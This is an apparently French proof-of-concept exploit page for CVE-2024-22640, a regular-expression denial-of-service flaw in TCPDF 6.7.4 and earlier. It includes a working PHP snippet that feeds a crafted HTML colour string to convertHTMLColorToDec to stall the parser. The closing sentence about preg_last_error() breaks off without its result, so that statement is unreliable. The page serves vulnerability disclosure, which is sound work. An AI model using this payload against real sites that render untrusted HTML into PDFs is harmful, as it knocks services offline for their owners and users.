
Exploit de preuve de concept pour CVE-2024-22640, une vulnérabilité ReDoS dans TCPDF <=6.7.4 déclenchée par une entrée de couleur HTML malveillante, avec code de démonstration.
Déni de service par expression régulière (ReDoS)
TCPDF <= 6.7.4
L'analyse HTML des couleurs par TCPDF contient une charge utile malveillante.
TCPDF version <= 6.7.4 est vulnérable à ReDoS (Déni de service par expression régulière) lors de l'analyse d'une page HTML non fiable contenant une couleur malveillante.
<?php
require_once('../tcpdf.php');
$test = new TCPDF_COLORS();
$ref = "none";
$test -> convertHTMLColorToDec('["t"000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000!]',$ref);
?>
Note : En vérifiant avec preg_last_error() après la ligne de code vulnérable, l'expression régulière se termine par .